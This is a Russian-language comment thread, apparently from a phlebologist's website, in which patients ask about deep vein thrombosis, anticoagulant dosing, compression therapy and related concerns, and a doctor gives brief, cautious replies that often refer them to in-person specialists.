Ответить

Здравствуйте, подскажите, пожалуйста в таком вопросе.В декабре распухла нога и обнаружили ТГВ(ПБВ,ПВ и ЗББВ).Назначили Ксарелто по 15 два раза в день 3недели,а потом по 20мг один раз в день, Детралекс и компрессионный чулок 2 класса компрессии . Через месяц сделали повторное УЗИ и опять подострый тромбоз ПБВи ПоВ левой н/к в ст. начальной реконализации(до10процентов). Скажите, может ли так плохо рассасываться тромб(читала,что в первые месяцы все происходит быстрее),и как долго может отсекать нога.?Я ношу компрессионный чулок,но нога отекает в колене около 2 см в диаметре в отличии от здоровой ноги,и в щиколотке около 1 см.Почему это происходит при носке чулка и это может быть.?Как долго может держаться отек?

Скорость рассасывания (реканализации) у всех разная и большого значения это не имеет. Отек 1 см и больше в окружности лодыжки, на мой взгляд — многовато. Нужно «улучшать компрессию». Или переходить на 3 степень компрессии, или отдаться специалистам на бандажирование ноги для быстрого устранения отека и подбора трикотажа по уже неотечной ноге для поддерживающей терапии.

Спасибо за ответ.Как я поняла,то у нас врач бандажирование не делает..А вообще из-за тромба может быть такой отек?И возможна ли хромота при тромбозе Просто до этого была проблема по неврологии с этой ногой и была хромота и в это время начался тромбоз.Невролгию как-бы убрали,но теперь не понимаю из-за чего хромота.То ли это даёт отек выше колена,то ли что-то другое.Врачи на этот вопрос ответить не могут.

Естественно, может. Отек — основное проявление тромбоза.

Ответить

Евгений, добрый день. Пожизненно принимаю ксарелто на фоне тромбофилии. Планирую удалять зуб мудрости. Стоматолог рекомендовал не принимать антикоагулянты за три дня до приёма. Как Вы оценивание такую рекомендацию?

Все зависит от того, насколько важна антикоагуляция, то есть, насколько велик риск рецидива тромбоза при отмене. Заочно я это не определю. В целом, удаление зуба не требует отмены антикоагулянтов, но стоматолог должен быть готов справиться с кровотечением из лунки, если оно чрезмерное по обьему или продолжительности.

Ответить

Здравствуйте, я хотела сделать минифлебэктомию, но врач сказал, что если есть тромбофлебит, то делать можно только классическую флебэктомию. Это правда или искать другого врача?

Простите, но вопрос лишен смысла. Минифлебэктомия — это часть общей операции на венах, которая может сопровождать как лазерную запайку, так и «классическое» удаление источника варикоза. А флебэктомия — это и есть «классическая» операция с разрезами и удалением вены — источника. В современной флебологии почти нет ситуаций, когда «классическая» операция с разрезами лучше лазерной, и тромбофлебит к таким ситуациям не относится.

 

Ответить

Добрый день, Евгений Аркадьевич! Вопросы, на которые очень хотел бы получить ответы, буду вам очень благодарен если вы подробно ответите — можно ли делать опреденные вещи,и есть ли риски? Мне 30 лет. 10 лет назад перенес илеофлеморальный тромбоз после травмы голени — перелом. Анамнез — ПТФС. Полная окклюзия глубоких вен в повздошном сегменте.. Отток крови идет по компенсаторным венам — выраженная коллатеральная сеть (вены в паху и на животе). Тромбомассы в ПБВ до 50-80%, в ПВ до 30-40%. Есть рефлюкс по ЗББВ и ПВ 1-2 ст. СФС — несостоятельно. Бедренный сегмент БПВ — состоятельный. НПВ — проходимы. Отека на ноге нет, ношу чулок. Можно ли 1. Ходить в баню 2. Окунаться в холодную воду 3. Делать лимфодреннажный массаж ноги Я делаю все перечисленное, никаких проблем с ногой нет. Но мне сказали что такое делать категорически нельзя если был тромбоз. Хотел узнать ваше мнение настолько ли это опасно и противопазано? На авторитетных ресурсах к сожалению я не смог найти ответы на эти вопросы. Благодарю за внимание.

1. Можно. Избегать обезвоживания.

2. Можно.

3. Не вижу смысла, раз нет отека ноги.

Ограничения на баню и всякие водные процедуры — очень распространены. Можно сказать, «мифологизированы». Никакого научного обоснования у таких ограничений нет. Ни в отечественных, ни в зарубежных рекомендациях по лечению венозных тромбозов таких ограничений нет. Я за свою практику не встретил ни одного «тромбоза от бани».

Евгений Аркадьевич, благодарю вас за ответ, полностью с вами согласен! Тут скорее вопрос в том, есть ли риск отрыва тромба и тэлы, вследствие — контрастных процедур (вены расширяются и сужаются) или от массажа ( вены испытывают давление). Но как я понимаю, там вместо тромбов уже рубцы образовались за долгие годы, и то что такие процедуры вызовут отрыв тромбов крайне маловероятно . Поправьте если я не прав. Спасибо!

Все верно, отрываться нечему, речь только о рисках образования новых тромбов.

Евгений Аркадьевич, благодарю вас что создали такую возможность задавать вам вопросы! Это очень ценно, еще раз спасибо!

Здравствуйте! Сколько после коронавируса сохраняется риск тромбозов? 7 лет назад был тгв. после лечения антикоагулянты принимала только во время 2й беременности . В ноябре заболела короновирусом, от положительного теста месяц колола клексан и после выздоровления месяц эликвис. После укола в/м обнаружила что крови очень много вылилось. сдала анализы, ддимер в норме, мно 1,42, пти 61, пв 15,9, ачтв 27,7. Врач сказал что уже модно отменять антикоагулянты. Вопрос — какое время после болезни сохраняется риск тромбозов? достаточно ли 1 месяца приёма антикоагулянтов учитывая анамнез

По зарубежным и отечественным правилам антикоагулянты пациентам группы риска (когда в прошлом был тромбоз) нужно только во время болезни. После выздоровления — не нужно.

Ответить

Здравствуйте. Мне 35 лет. В ноябре 2020 перенесла илеофеморальный тромбоз слева после замершей беременности на большом сроке. На данный момент принимаю ксарелто 20 мг. Левая нога в трикотаже 2 ст компрессии все равно отекает, чувство расписания при нахождении в вертикальном положении. На узи субокклюзия ОПВ. Предлагают стент поставить, но на данный момент их нет в наличии. Либо просто попробовать пройти и расширить спец балоном( как я поняла) и ничего туда не ставить, проходимость может восстановиться. Вопрос в чём: 1. Что лучше стент или без него. 2. Сколько мне ещё пить ксарелто? Уже год пью. А вы всегда говорите, что после единично перенесённого тромбоза год достаточно. 3. Если ничего не делать с проходимостью подвздошной вены, то ксарелто надо пить всю жизнь?

1. Ангиопластика (расширение суженного места баллоном) должна завершаться стентированием.

2. Не знаю. Задайте вопрос тому, кто Вам назначил препарат на такой срок — какие основания для столь длительного приема.

3. Это не связанные вещи. Ксарелто — защита от повтора тромбоза. Ангиопластика и стентирование — борьба с отеком ноги.

Мой лечащий врач аргументирует долгий приём ксарелто, тем что у меня гетерозигота F2(протромбина). И пока не разберусь с проходимостью подвздошной вены, говорит надо пить. Боится рецедива. Меня же больше всего волнует: так и не ушедший до конца отёк на ноге. Вылезшие вены внизу живота( в вертикальном положении тела). Появившийся и мешающий жить геморой( пока я на ксарелто никто не хочет мне его убирать малоинвазивными методами). Вопросы: 1. Может поменять компрессию на 3 класс? 2. Насколько будет хуже, если не ставить стент, а просто жить так, просто убирая последствия( вылезающие поверхностные вены и геморрой). Мне говорят что всё будет постоянно возвращаться. 3. Отёк в голени 1-1,5 см разницы к вечеру. В икре 2-2,5см. Утром разница около 5 мм.

Нужно понять предел возможностей заочных консультаций и разграничить сферу компетенций. Вены на животе и сохраняющийся отек косвенно (подчеркиваю, косвенно!) говорят о том, что сужение имеет значение для состояния ноги. А может быть оно ни при чем, и нужно корректировать компрессионную терапию. Решает эти вопросы специалист, который сам занимается таких устранением сужений, именно венозных. И для решения нужна прямая визуализация подвздошных вен, КТ-венография. И не просто КТ-венография, а пправильно проведенная и правильно оцененная. Я этим не занимаюсь. В Петербурге основной специалист по таким проблемам вместе со специалистом по КТ проводят исследовагие, садятся, и все разбирают, взвешивают и планируют. Причем, в некоторых проблемах нет однозначно правильного решения, бывает, что есть несколько вариантов (примерно равных по балансу ожидаемой пользы и возможных проблем), и один специалист будет склоняться к одному, а другой к другому не потому-то кто-то из них неграмотный дурак, а потому что решения неоднозначны и на них влияет много факторов. Посему, в Вашей ситуации я вижу только один путь — очная консультация специалиста, занимающегося венозным стентированием. А если таковая была, и Вы не получили ответы на все вопросы — «второе мнение» у другого такого специалиста.

Спасибо, за быстрый ответ. В том-то и дело, что консультаций было две( в Пирогово и НМИЦ ЛРЦ Минздрава России). Тактики врачей разошлись. Нужна теперь третья. Не подскажите куда ещё обратиться с моей проблемой?

Напишите мне на почту, у кого консультировались, возможно я смогу что-то посоветовать. Лучше приложить сканы заключений. Адрес почты во всплывающей нижней части сайта.

Ответить

Добрый день! Маме вместе с удалением рака молочной железы удаляли также лимфоузлы в руке (9 лет назад была операция, в 49 лет). Надевает компрессионный рукав регулярно, массаж у специалистов не назначали. Рука в постоянно отёкшем состоянии примерно всё это время, отёк очень заметный. Недавно было рожистое воспаление (возникло после другой операции, на колено, прошло после антибиотиков). Подскажите, есть ли какие-то способы значительно сократить отёк и сделать профилактику воспалений в этой ситуации, когда лимфоузлы удалены? Стоит ли с этим идти на приём к флебологу или рекомендации универсальны?

Способ один — ручной лимфодренирующий массаж и бандажирование  с постепенным уменьшением объема и, в случае успеха, подбора компрессионного рукава нового размера для поддерживающей терапии. 

Ответить

Здравствуйте. У мужа воспалился геморрой. Можно ли пить Детралекс? Он пьет ксарелто 10мг, ему назначили. после ковид. Можно ли такое сочетание?

Лечением геморроя занимается проктолог, не моя компетенция. Но детралекс при приеме Ксарелто — можно.

Ответить

Здравствуйте. В ноябре диагностировали тромбоз камбаловидной вены. Назначили ксарелто 20 мг, но во время месячных началось меточное кровотечение, делали выскабливание. Хирург предлагает перейти на 10 мг, на время месячных не отменять. Гинеколог настаивает на отмене во время месячных. Скажите пожалуйста есть ли толк от 10 мг? Можно ли не принимать ксарелто во время первых трёх дней месячных? Или какие дополнительные обследования пройти/ анализы сдать чтоб уточнить необходимую и допустимую в моём случае дозировку? Спасибо огромное за ответ.

Нужно, в первую очередь, определиться, это усиление месячных на фоне антикоагулянтов или есть особый источник кровотечения. Если усиление месячных (так называемые «значительные менструальные кровотечения» (heavy menstrual bleeding)), то вариантов тактики немало: общее снижение дозы антикоагулянта с учетом давности тромбоза, временное снижение дозы антикоагулянта или даже его отмена на время месячных, использование различных контрацептивов (иногда могут применяться даже КОК, хотя предпочтение обычно отдается другим типам гормональных препаратов), использование транексамовой кислоты. Решение проблем значительного менструального кровотечения на фоне антикоагуляции — компетенция гинеколога. И не через интернет.

Если нужна защита от тромбоза, а при этом наблюдается кровоточивость на фоне приема антикоагулянтов -это самая непростая ситуация в определении тактики лечения, когда врачу нужно в деталях взвесить все «за» и «против» того или иного варианта лечения. Заочно такие вопросы не решаются.

Ответить

Здравствуйте, подскажите пожалуйста в общем анализе крови показатель РСТ 2.25 ,надо ли пить ксарелто?Если да то какой дозировка и сколько раз в сутки?

Антикоагулянты не назначаются «по анализам»

Ответить

После катетера образовался флебит. Месяц лечили дретралексом 1000 и детрагелем. После лечения состояние не улучшилось. Сделал УЗИ. Оклюзивный тромб 4.5см из лечения прописали элеквис 2.5 мг ,2раза детралекс 1000 детрагель. Вопрос правильно назначены препараты? Просто никогда не болел а тут вот.

Что значит — состояние не улучшилось? Цель лечения при катетерном тромбофлебите — снять воспаление (боль, покраснение). Уплотнение часто проходит очень долго, месяцами, и никакого внимания и лечения не требует. Это же касается и остаточной «закупорки» венки на УЗИ. Это уже не тромб, это последствия перенесенного тромбоза.

Ответить

Здравствуйте.В ноябре 2020 г. после кесарева перенесла илеофеморальный тромбоз слева.До сих пор пью Ксарелто 20 мг. Врач назначил анализ на генетические тромбофилии и кардиогенетику. Подскажите пожалуйста какие показатели определять?Разные лаборатории предлагают разные.Каких будет достаточно.Заранее благодарю.

Здравствуйте, после ковида появился сухой кашель, врач прописала бронхомед+серрата по 1т/3р в день 5 дней. Я в данный момент продолжаю прием антикоагулянта ксарелто 10мг. Вопрос в инструкции написано, что одновременно эти препараты не применяются, Подскажите, как быть..

Обратиться к врачу. Предполагаю несколько вариантов: или не пить серрату, или не пить антикоагулянты, или не пить совсем ничего, или пить и одно, и другое, но «под строгим наблюдением врача». Я в этой ситуации помочь не могу. Я, вообще-то, венами занимаюсь.

Ответить

Здравствуйте. Дочь перенесла тромбоз глубоких вен левой нижней конечности во время беременности, возможно из за перенесенного ковида, антитела были обнаружены спустя время. Случилось это в октябре2020года.На Уздс — 70-75% просвета тромботические массы в стадии реканализации. Лежала в сосудистой хирургии,до родов и после родов кололи клексан. После завершения курса НМГ,20мг ксарелто в теч. 3мес ,затем 15мг ксарелто 3месяца, стали обильные длительные менструации, плюс внутренний геморрой время от времени стал кровить. На УЗДС на сегодняшний день 20-25% просвета тромботические массы. Перешли на 10мг ксарелто, пропили 1мес и стали замечать обширные синяки на ногах и на грудной клетке. Это пугает нас. Может еще снизить дозировку ксарелто или прекращать. Компрессионный трикотаж носим 1класса.

Обсудите с врачом очно прекращение приема антикоагулянтов. Год — обычно достаточно для лечения ТГВ, тем более есть признаки повышенной кровоточивости.

Ответить

Доброе утро!Тяжело переболела ковидом,лежала в реанимации.выписали с назначением пить Эликвис 2.5 мг,все пью .для контроля сдала анализы ,в том числе и Д димер,при норме 0-750 нг/мл результат 827 ,насколько это опасно?и значит ли ,что уже есть тромбы?

Обращайтесь к врачу очно. Если нет дополнительных факторов риска тромбоза, то после выписки антикоагулянты не нужны. Дополнительные факторы риска перечислены в рекомендациях по терапии ковид-инфекции. Российские рекомендации по терапии ковид инфекции и профилактике тромбозов общедоступны, доктора должны ориентироваться на них https://minzdrav.gov.ru/ministry/med_covid19 

Ответить

Добрый день! Принимаю КОК, кардиомагнил 75мг. Результаты анализа: протромбиновое время 9,7 сек., МНО 0,99, ПТИ по Квику 101%, АЧТВ 26,5 сек, фибриноген 2,95 г/л, фактор VIII 167,0 % (при норме 50-150), фактор фон Виллебранда 125,0%, антитромбин III 95,2%, протеин С 125,1%, протеин S 58,0% (при норме 72-106), спонтанный эуглобулиновый лизис 230 мин, д-димер 2,86 мкг/мл (при норме 0-0,5), волчаночный антикоагулянт 1,03. Рекомендовано с учетом высокого риска ВТЭО прием ривароксабана по 15мг 2 раза в день в течении 3 недель. Насколько правильно подобрана дозировка при таких результатах анализа?

Антикоагулянты не назначают по анализам. Комментировать анализы — совершенно бессмысленное занятие, которым я не занимаюсь.

Ответить

Добрый день.Я принимаю Ксарелто 20 мг.Мне его дают по льготе.Конец года,дали упаковку 15 мг из за отсутсвия 20 мг.ДЗ-рецедивирующий тромбоз,АФС.Что то надо добавлять?Может как то повлиять на здоровье снижение дозировки.Вариантов купить пока нет.Спасибо

Снижение дозировки антикоагулянтов повышает риск рецидива тромбоза. 

Спасибо.

Доброго времени суток. Переболела ковидом в легкой форме(левое легкое 5 проц,правое чистое),был только высокий пульс 130-120,после чего был назначен конкор. Все анализы на 10 день ковида были в норме,распределение тромбоцитов совсем чуть-чуть повышено. Диагноз тромбоз мне никогда не ставили. Из хронических болезней только бронхиальная астма(с лета синдром хвостика,причина которого пока не ясна,уже кучу анализов сдала,пока непонятно в чем дело). На фоне ковида назначили ксарелто 10мг на месяц,как профилактику. Я пропила три недели. Иногда на пальцах левой руки лопаются сосудики. На экг появилась синусовая аритмия,которой не было.Кардиолог говорит говорит прекращать пить ксарелто. 1.Можно ли? 2.как с него «слезть»? 3. Как потом понять,что нет побочек ,стоит ли сдать какие-то анализы?

Я не лечу заочно и не занимаюсь впрямую ковидом. В целом легкое течение ковида при амбулаторном лечении антикоагулянтов не требует. «Слезать» с них не нужно (что за дикость такая?), просто перестать принимать, если они больше не нужны.

Ответить

Добрый день, Евгений Аркадьевич! Я принимаю варфарин ( врождённая тромбофилия,тромбозы глубоких вен ноги). можно ли делать татуировку на предплечье или стоит снизить дозировку во избежание нежелательных кровотечений? Спасибо!!!

Такие манипуляции не требуют отмены антикоагулянтом. Даже небольшие хирургические операции, удаление зуба и т.п. проводят не меняя режим приема антикоагулянтов. 

Ответить

Спасибо за ответ, может вы можете посоветовать врача гемостазиолога в Киеве? Врачи есть, но хотелось бы вашу рекомендацию

К сожалению, не могу, нет таких контактов или информации.

Ответить

Добрый день! Переболела ковид дома, был назначен Эликвис 2,5, потому что принимаю КОК. Подскажите, пож-а, сколько принимать необходимо Эликвис после выздоровления? Какие анализы сдать, чтобы удостовериться, что кровь не густая? Спасибо.

Эликвис не назначается и не отменяется по анализам. По идее, отменять нужно при выздоровлении.

Ответить

Добрый вечер, Евгений Аркадьевич! Скажите, пожалуйста, существуют ли вообще препараты, снижающие количество тромбоцитов в крови ( с 470 до нормы) ? спасибо!

Существуют. Только, насколько я знаю, их используют не при таких цифрах тромбоцитов. Обратитесь к гематологу.

Ответить

Спасибо за ответ, может вы можете посоветовать врача гемостазиолога в Киеве? Врачи есть, но хотелось бы вашу рекомендацию

К сожалению, не могу. 

Ответить

Здравствуйте, подскажите пожалуйста, можно ли принимать пожизненно ксарелто 20 / уже принимаю 1,5 года/, тромбофилия /дефицит протеина С и S/, мой врач ориентируется на анализ фибриногена, который завышен 4,4 при норме 4. В 2020году четвертый тромбоз ГВ, при этом фибриноген был 5, или нет смысла ориентироваться на этот анализ, остальные анализы в норме. Можно ли перейти на дозу ниже 15 или10 /делить 20 пополам так как 10 очень дорогая , если принимать пожизненно/, есть проблемы с печенью / портальный фиброз/, принимаю много медпрепаратов — вальсакор, небилет, эутирокс, иногда нспв /псориатический артрит тоже в перечне моих заболеваний/ И второй вопрос — похоже это врожденная тромбофилия / брат умер от тромбоэмболии ЛА, у отца было 3 инфаркта и 2 инсульта/. У меня есть внуки 13,14 лет -мальчики, и девочка 3-х лет. Надо ли проверить детей на тромбофилию, если да, то в каком возрасте?

В целом при повторных тромбозах нужна бессрочная (пожизненная) антикоагуляция с регулярным (раз в год, например) пересмотром целесообразности продолжения, предпочтительного препарата и дозировки. И в целом для продленной антикоагуляции для Ксарелто рекомендуется доза 10 мг. Но из общих правил могут быть исключения. Оценить Ваш случай дистанционно невозможно. Пожалуй, имеет смысл проконсультироваться очно с гематологом (лучше с тем, кто занимается тромбозами — гемостазиологом). По фибриногену степень защиты от повтора тромбоза не оценивается.

Что касается детей, то, с учетом Вашей и семейной истории, их нужно обследовать на основные тромбофилии, в том числе по протеинам С и S. В каком возрасте — не подскажу, нужно советоваться с педиатром или детским гематологом, но старших, как мне кажется, уже нужно. От этого могут зависеть меры защиты от тромбозов в различных жизненных ситуациях (травмы, заболевания, необходимость в плановом хирургическом лечении, длительные путешествия и т. п., для девочки, в будущем — возможность приема КОК и меры защиты при планировании беременности).

 

Ответить

Здравствуйте! Переболела Covid-19, лежала в больнице, КТ-1. Выписана 08.11.21. Сдала анализ через месяц после выписки на Д-димер, результат 290 при норме 243. Ксарелто 10 м принимала месяц, отменил врач как раз за пять дней до сдачи анализа (сама решила сдать). Ферритин 73, был 400. Стоит ли переживать по поводу Д-димера. Заранее Вам благодарна!

Д-димер после ковид-инфекции не является «предиктором» тромбоза, антикоагулянты по его уровню не назначают.

Ответить

Здравствуйте. 15 ноября поставили тромбоз глубоких вен, кололи уколы, сейчас пью ксарелто и детралекс. Ношу компр. трикотаж. Но когда хожу отёк увеличивается и болит икра, нога становится твёрже. Скажите это нормально или нет? Ещё лор выписал цефаксим антибиотик, можно ли его мне принимать в данный момент? Заранее спасибо)

Если отек усиливается в вертикальн6ом положении — значит нужно менять компрессию. Цефиксим и ривароксабан можно сочетать. Детралекс к лечению ТГВ и посттромботических проблем отношения не имеет.

Здравствуйте! а какие флеботоники лучше всего принимать принимать при постромботических проблемах??

Не имеет значения, они на развитие этих проблем не влияют. Флеботоники — симптоматические средства.

Ответить

Добрый день. Подскажите, пожалуйста, можно ли колоть Фленокс или пить Ксарелто во время месячных? Я переболела ковидом, в очень тяжёлой форме, и когда была в реанимации, как раз были месячные (они у меня очень обильные и болезненные, миома), помню что врач опасался колоть Фленокс. Сейчас я дома, колю сама, колоть ещё 7 дней, и начинаются критические дни. Подскажите, пожалуйста, как правильно поступить. Заранее спасибо за ответ.

Продублирую ответ на подобный вопрос:

Если нужна защита от тромбоза, а при этом наблюдается кровоточивость на фоне приема антикоагулянтов — это самая непростая ситуация в определении тактики лечения, когда врачу нужно в деталях взвесить все «за» и «против» того или иного варианта лечения. Заочно такие вопросы не решаются.

При так называемых «значительных менструальных кровотечениях» (heavy menstrual bleeding) вариантов тактики немало: общее снижение дозы антикоагулянта с учетом давности тромбоза, временное снижение дозы антикоагулянта или даже его отмена на время месячных, использование различных контрацептивов (иногда могут применяться даже КОК, хотя предпочтение обычно отдается другим типам гормональных препаратов), использование транексамовой кислоты. Решение проблем значительного менструального кровотечения на фоне антикоагуляции — компетенция гинеколога.

 

Ответить

Доброго времени суток. Можно ли ставить фленокс 0,4 во время менструации?

В противопоказаниях, кажется, такого нет.

Ответить

У моей мамы ( 78 ) была операция остеосинтеза тазобедренного сустава после падения и перелома шейки бедра. При УЗИ вен на другой ноге нашли небольшой тромб. Прописали ксалрето 2 раза по 15, а через три недели по 20 мг. Две недели она пропила, и я хотела уже через пару дней выдать дозировку 20мг. Сегодня выяснилось, что уже четыре дня назад она не нашла таблетки и не пила, и к сожалению, не сказала :(. Поругалась и выдала ей 15 мг вечером. Перерыла интернет и не нашла, что делать если перерыв такой ( пишут только об одном дне). Стоит ли завтра давать тогда опять 2 по 15 несколько дней, а потому переходить на 20? Заранее большое спасибо

Просто возобновить прием по назначенной схеме, как будто этого перерыва не было. 

Ответить

Здравствуйте.мужу на фоне covid19 назначили пить ксарелто 10мг по утрам.пьет уже 3 недели.Д димер в норме,а вот тромбоциты уменьшаются .последний анализ показал тромбоциты 128 при норме min 146 и понижение гемоглобина до 126 при мин.норме 131. При первоначальном приеме ксарелто были носовые кровотечения.назначили аскорутин.Скажите пожалуйта,не противопоказано ли при таких анализах крови пить ксарелто?и можно ли перейти на курантил 75мг?спасибо.

Прием этих препаратов не регулируется по анализам. 

Ответить

Добрый день. Я из Казахстана. Летом этого года на фоне приёма гормонального препарата случился ТГВ. Получала лечение в стационаре, затем амбулаторно. Ксарелто.До этого времени остаются признаки тромбоза нпв, обв, пбв, пв. Сейчас появилась возможность поехать в Новосибирск. Может вы подскажете флеболога по моей проблеме, к которому могу записаться в Новосибирске. Спасибо.

Кого-то конкретно не подскажу. Можно выбрать из членов АФР https://phlebounion.ru/afr/members/city-list 

Ответить

Здравствуйте! Мне 28 лет, после КОВИД появились боли в левой ноге, принимал Ксарелто 15 дней. УЗИ показало, что на левой ноге суральные верны расширены до 9.0 мм, в просвете икроножной вены неоднородные гиперэхогенные массы (протяженностью до 7.0 см) Вена не компрессивна, маневр дистального усиления отсутствует. Был на приеме у двух врачей. Первый назначил: продолжать Ксарелто 10 мг один раз в день до 3 месяцев, детролекс в таблетка, чулок или гольфы II класса. Второй назначил: 10 дней Ксарелто 10 мг. два раза в день 10 дней, следом 10 мг один раз в дней, общий курс — месяц, плюс мазь Лиотон, гольфы 1 класса компресси и магнит на 15 минут один раз в день. Скажите, пожалуйста, какой курс лечения, по Вашему мнению, назначен верно. Есть ли необходимость повышать дозу Ксарелто на 10 дней или стоит продолжать начатый курс по 10 мг. один раз в день? Заранее спасибо, что уделили время.

Вы описываете тромбоз глубоких (мышечных) вен. Антикоагуляция не менее 3 мес. Для Ксарелто в инструкции есть схема лечения ТГВ, которая не просто так написана — это максимально эффективный режим, и отклоняться от него без очень веских оснований нельзя. 3 недели доза 30 мг в сутки (15х2), затем до 3 мес по 20 мг в сутки в один прием. Далее принимается решение продлевать антикоагуляцию, или остановить. Отсчет указанных сроков может вестись как от предположительной даты начала тромбоза, так и от даты начала лечения — зависит от ситуации. Компрессия помогает более скорому рассасыванию тромботических масс, но лучше качественный трикотаж (гольфы), чем бинтование, если нет значительного отека. Все эти вопросы должны быть понятно Вам и исчерпывающе обсуждены очно. Детралекс, магниты и мази к лечению ТГВ никакого отношения не имеют.

Большое спасибо за столь быстрый ответ. Дозу 10 мг. мне назначали врачи. Правильно ли я понимаю, что сейчас мне необходимо изменить дозировку на 30 мг. и придерживаться её 3 месяца?

Я не могу оценить сроки начала болезни и дистанционно менять Вам назначения. Как по каким срокам положено — я описал.

Здравствуйте! Был на повторном УЗИ. Специалист и врач сказали, что вены проходимы, тромб рассосался. Однако боли не проходят уже на протяжении недели. Скажите, пожалуйста, могут ли боли сохраняться при отсутствии тромбоза?

Раз сохраняются — значит могут, и, значит, они не от тромбоза. Даже если тромб быстро полностью «рассосался» рекомендуемый срок антикоагуляции прежний — 3 мес.

Здравствуйте. Вынужден снова к Вам обратиться., 14.12 на УЗИ не обнаружили тромбов. После, боли перестали беспокоить полностью, вплоть до 12. 01. Сейчас боль и дискомфорт вернулись, вновь сходил на узи, результат неоднозначный: «суральные вены расширены до 5 м.м, в просвете икроножной вены неоднородные гиперэхогенные массы (протяжённостью до 5 см) Стенки неровные, убедительно тромоботические массы на момент осмотра не выявлены. Компрессия неполная, манёвр дистального усиления слабый. Вчера выпил последнюю таблетку Ксарелто 10 мг, итого пропил две упаковки по 30 шт. по назначению врача. В настоящий момент исходя из прописанного лечения Ксарелто больше не должен принимать. Скажите, пожалуйста, с учётом нынешнего состояния вен, какие действия дальше предпринимать? Продолжать ли пить Ксарелто и есть ли риск тромбоза при нынешних результатах УЗИ? Заранее большое спасибо за ответ!

Здравствуйте. Такие вопросы не решаются заочно, по ограниченной информации. Сомнения трактуются в сторону тромбоза. Минимальный срок антикоагуляции — 3 мес, но она должна проводиться по инструкции (30 мг в сутки в течение 3 недель, потом 20 мг в сутки до 3 мес). А потом с учетом Вашего возраста, здоровья и разных других факторов принимается решение, продлевать или нет. Нет ответа в одном месте — обратитесь за вторым мнением в другое.

Евгений Аркадьевич, проблема как раз в том, что врачи настаивают на приёме 10 мг в сутки, не более. Это уже три флеболога! Меня пугает, что тромбоз вновь появился спустя две недели, при этом я не прекращал приём Ксарелто. Может быть вы можете посоветовать хорошего флеболога в городе Перми или может возможна платная консультация у Вас, разумеется, с отправкой всех анализов и исследований.

В Перми можно попробовать обратиться к Владимиру Евгеньевичу Денисову. Дистанционная консультация у меня возможна, информация на сайте клиники: https://reaclinic.ru/actions/onlajjn-konsultacii-v-reaclinic/

Ответить

Зравствуйте. У меня ИБС и проведено две операции РЧа легочных артерий. Назначили ксарелто 20 мг с мая 2018г., в ноябре закровоточили десна. Три дня не принимаю ксарелто, десна порозовели, не кровоточат. Правильно ли я поступила?

Это не моя сфера компетенции. Адресуйте вопросы кардиологу.

Ответить

Уважаемый Евгений Аркадьевич!У меня следующий вопрос-пациент 55 лет перенес массивную и субмассивную ТЭЛА (сегментарных и субсегментарных артерий)после длительного перелета.Более 2 лет принимает Ксарелто 10мг,никаких дополнительных обследований и назначений нет.Как долго можно(и нужно ли ) принимать Ксарелто в данной ситуации и возможен ли прием этого препарата при незаконченном обследовании на тромбофилию.Спасибо.

Стандартно первый (единственный) эпизод ТЭЛА не требует антикоагуляции больше 3-6 мес, однако многие особенности конкретного случая могут сделать исключение из этого правила (например, так называемый «кардиопульмональный резерв»). Наличие или отсутствие тромбофилии для определения длительности антикоагуляциизначения  не имеет.

Ответить

Добрый день, Евгений Аркадьевич. У меня диагноз тромбоз ПБВ, сделано легирование ПБВ слева. пять месяцев назад. В данный момент принимаю ксарелто по 10 мг 1 раз в день. Сейчас появилась необходимость удаления зуба мудрости. Надо ли отменить прием ксарелто до процедуры удаления зуба? Если надо, то за сколько дней прекратить прием ксарелто до процедуры удаления зуба? И когда можно продолжить прием ксарелто после процедуры удаления зуба? С уважением, Александр.

Удаление 1-2 зубов не требует отмены антикоагулянтов, однако советую заранее предупредить стоматолога, что Вы принимаете антикоагулянты. В некоторых ситуациях приходится применять местные гемостатические средства или другие приемы для гемостаза, стоматолог должен быть к этому готов. 

Ответить

Здравствуйте. 33г ИМТ>40, варикоз. Давление иногда 150/95 после отмены ксарелто. Принимал почти три года. Был единственный в жизни зарегистрированный тгв, возможно спровоцированный нимесулидом, витаминами группы В и травмой (наступила жена на внутреннюю сторону колена когда я лежал). Отягощенная наследственность — мать умерла от запущенной ТЭЛА. Коагулограмма в норме. Кислород 98, ковидом не болел. Бросил курить, не пью. Сидячая работа — под вечер отекает возле сустава, который соединяет голень и стопу, с внутренней стороны, стараюсь использовать эластичный бинт, не туго затягивая. На узи никаких признаков тромбоза, после прошлого осталась легкая недостаточность клапана у которого был тромб («пропускает»). Я понимаю, это не онлайн-консультация, но очно невозможно, а найти толкового флеболога все не выходит. Вопрос один — рациональная ли была эта отмена? Есть эпизодические легкие боли в ноге, не сильные, но очень боюсь повторного тромбоза. Спасибо большое

Нужен очный осмотр. Если укажете город проживания — возможно, подскажу к кому обратиться.

Украина, Днепр. Потому и говорю что невозможно, к сожалению

При однократном случае венозного тромбоза очень редко не нужна антикоагуляция больше года. При более длительном приеме риск тяжелого кровотечения становится выше риска повтора серьезного тромбоза. Компрессия при отеке — это правильно, но лучше использовать качественный компрессионный трикотаж (гольфы). Степень компрессии определяет доктор очно. В Запорожье кого-то подсказать не могу, но если доберетесь до Днепра — обратитесь к Денису Михайловичу Свирскому — высококлассный специалист.

Понял, спасибо Вам большое!

Здравствуйте. О проблемах с кровью узнала после тромбофлебита притоков БПВ (вариксы), перенесенного в 37 недель беременности. Остальное время беременности и период после родов- под антикоагулянтами, к сожалению не помню дозировку. Через 1,5 года снова случился тромбофлебит(приток бпв, варикозно расширенный), после чего сделала эвло и исследовала кровь. Эвло прошло не оч удачно , тк через полгода запаянные вены распаялись и переделывали заново. По крови мутации FGB, ITGA2 и протромбин F2 Thr165Met в гетерозиготных формах, остальное в норме (активность антитромбина 3, активность фактора 8, активность протеинов S и C, волчаночный антикоагулянт, гомоцистеин, антитела к кардиолипину и бета-2- гликопротеину. После повторной операции все было хорошо, затем наступила беременность. Я сдала коагулограмму (протромбин по квику 89.1 (70 — 130), МНО 1,07, фибриноген 1,94 г/л (1,8 — 3,5) , ачтв 22,3 сек (21,1 — 36,5), д-димер 1,124 мкгFEU/мл (0.002-0.55). Гематолог срочно посадила на уколы Клексан 0.4, 1 раз в день, ей не понравился д-димер , ачтв и анамнез. Я начала колоть, решила на след день пересдать в ИНВИТРО, пришли результаты через день ( в итоге вколола 2 дозы, пока пересдавала и ждала) ПВ 12,1 (10 — 13,2), протромбин по Квику 90 (80-133), мно 1,03, ачтв 30,9 (25,4 — 36,9 ), фибриноген 2,8 г/л (2,0-4,0), ТВ 13,9 (10,3-16,6), Д -димер 244 нг/мл (до 243 у небеременных, до 286 